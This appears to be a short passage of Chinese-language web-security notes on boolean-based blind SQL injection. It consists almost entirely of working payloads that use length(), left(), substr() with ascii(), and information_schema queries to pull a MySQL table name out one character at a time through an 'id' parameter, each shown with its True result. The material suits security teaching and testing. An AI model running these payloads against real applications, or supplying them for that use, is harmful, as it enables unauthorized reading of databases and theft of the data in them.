1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 2,1))=4 --> Ture
使用 left().
id=1 and left((select table_name from information_schema.tables where table_schema=database() limit 2,1),1)='u' --> True
id=1 and left((select table_name from information_schema.tables where table_schema=database() limit 2,1),2)='us' --> True
id=1 and left((select table_name from information_schema.tables where table_schema=database() limit 2,1),3)='use' --> True
...
使用 substr() + ascii() / mid() + ord().
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 2,1),1,1))=117 --> True
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 2,1),2,1))=115 --> True
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 2,1),3,1))=101 --> True
...
注意使用 limit n,n 限制查询条数.
|